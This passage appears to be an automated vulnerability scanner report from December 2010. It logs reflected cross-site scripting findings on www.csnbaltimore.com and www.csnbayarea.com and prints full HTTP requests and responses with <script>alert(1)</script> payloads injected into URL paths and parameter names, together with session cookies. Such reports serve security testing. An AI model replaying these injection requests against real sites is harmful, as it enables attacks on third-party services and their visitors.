<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/12/19/10/Troy-romps-over-Ohio-in-New-Orleans-Bowl/landing.html2df49<script>alert(1)</script>ad9caa4b51a"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11101<script>alert(1)</script>7ea30cac90f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:05 GMT Content-Length: 795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common11101<script>alert(1)</script>7ea30cac90f/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 42796<script>alert(1)</script>16425f7544b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:07 GMT Content-Length: 795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash42796<script>alert(1)</script>16425f7544b/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b920<script>alert(1)</script>7b7a88bb32 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:07 GMT Content-Length: 794 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player7b920<script>alert(1)</script>7b7a88bb32/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 427d9<script>alert(1)</script>4409074b274 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:08 GMT Content-Length: 795 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.php427d9<script>alert(1)</script>4409074b274"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2bec9<script>alert(1)</script>475f72e549d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/2bec9<script>alert(1)</script>475f72e549d HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:01 GMT Content-Length: 768 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/2bec9<script>alert(1)</script>475f72e549d"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c87c9<script>alert(1)</script>f27a974b0cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /c87c9<script>alert(1)</script>f27a974b0cb HTTP/1.1 Host: www.csnbaltimore.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:37:47 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:37:47 GMT Connection: close Content-Length: 758
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/c87c9<script>alert(1)</script>f27a974b0cb"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec77d<script>alert(1)</script>9b71b5ef431 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagesec77d<script>alert(1)</script>9b71b5ef431/landing HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:12 GMT Content-Length: 771 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagesec77d<script>alert(1)</script>9b71b5ef431/landing"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 662ba<script>alert(1)</script>16228c3e9fd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/landing662ba<script>alert(1)</script>16228c3e9fd HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:13 GMT Content-Length: 790 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/landing662ba<script>alert(1)</script>16228c3e9fd"</strong> ...[SNIP]...
2.206. http://www.csnbaltimore.com/pages/landing [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnbaltimore.com
Path:
/pages/landing
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7173f"><script>alert(1)</script>6e8be881a63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/landing?7173f"><script>alert(1)</script>6e8be881a63=1 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 30978 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:12 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web1.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="7173f"><script>alert(1)</script>6e8be881a63" id = "7173f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93041<script>alert(1)</script>c8d8901bf53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages93041<script>alert(1)</script>c8d8901bf53/main HTTP/1.1 Host: www.csnbaltimore.com Proxy-Connection: keep-alive Referer: http://www.csnbaltimore.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:00 GMT Connection: close Content-Length: 768
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages93041<script>alert(1)</script>c8d8901bf53/main"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cf476<script>alert(1)</script>07c535177df was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/maincf476<script>alert(1)</script>07c535177df HTTP/1.1 Host: www.csnbaltimore.com Proxy-Connection: keep-alive Referer: http://www.csnbaltimore.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:00 GMT Connection: close Content-Length: 787
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/maincf476<script>alert(1)</script>07c535177df"</strong> ...[SNIP]...
2.209. http://www.csnbaltimore.com/pages/main [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnbaltimore.com
Path:
/pages/main
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a7c5"><script>alert(1)</script>9bf552f789 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/main?9a7c5"><script>alert(1)</script>9bf552f789=1 HTTP/1.1 Host: www.csnbaltimore.com Proxy-Connection: keep-alive Referer: http://www.csnbaltimore.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Set-Cookie: PHPSESSID=09af6988921e1a055261e6e4db956dbc; path=/ Vary: Accept-Encoding Expires: Sun, 19 Dec 2010 18:31:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:00 GMT Connection: close Content-Length: 71533
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web4.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="9a7c5"><script>alert(1)</script>9bf552f789" id = "9a7c5"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5a40<script>alert(1)</script>2fc595593ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagesd5a40<script>alert(1)</script>2fc595593ef/profiles HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:11 GMT Content-Length: 772 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagesd5a40<script>alert(1)</script>2fc595593ef/profiles"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e2e26<script>alert(1)</script>12a624a60d0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/profilese2e26<script>alert(1)</script>12a624a60d0 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:12 GMT Content-Length: 791 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/profilese2e26<script>alert(1)</script>12a624a60d0"</strong> ...[SNIP]...
2.212. http://www.csnbaltimore.com/pages/profiles [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnbaltimore.com
Path:
/pages/profiles
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3344"><script>alert(1)</script>b44822d3468 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/profiles?c3344"><script>alert(1)</script>b44822d3468=1 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 38937 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:11 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!--
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e981e<script>alert(1)</script>cbb3f841745 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pagese981e<script>alert(1)</script>cbb3f841745/video HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:12 GMT Content-Length: 769 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pagese981e<script>alert(1)</script>cbb3f841745/video"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 88f56<script>alert(1)</script>dd0e6f8cead was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/video88f56<script>alert(1)</script>dd0e6f8cead HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:13 GMT Content-Length: 788 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/video88f56<script>alert(1)</script>dd0e6f8cead"</strong> ...[SNIP]...
2.215. http://www.csnbaltimore.com/pages/video [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.csnbaltimore.com
Path:
/pages/video
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bd0f"><script>alert(1)</script>b7a862edddf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/video?9bd0f"><script>alert(1)</script>b7a862edddf=1 HTTP/1.1 Host: www.csnbaltimore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 55931 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:12 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web5.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="9bd0f"><script>alert(1)</script>b7a862edddf" id = "9bd0f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a36d6"><script>alert(1)</script>4cc38bef644 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 35402 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12a36d6"><script>alert(1)</script>4cc38bef644/17/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c3af"><script>alert(1)</script>280925335e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/173c3af"><script>alert(1)</script>280925335e/10/Gutierrez-Denver-Raiders-matchups-to-wat/landing_gutierrez.html HTTP/1.1 Host: www.csnbayarea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=196443070.1292783063.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/18|utmcmd=referral; PHPSESSID=9ed7a29ad4025d98fb9fe4c2d1e65b2a; __utma=196443070.2074231682.1291777362.1291777362.1292783063.2; __utmc=196443070; __utmb=196443070;
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 35401 Content-Type: text/html Expires: Sun, 19 Dec 2010 18:31:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:31:20 GMT Connection: close
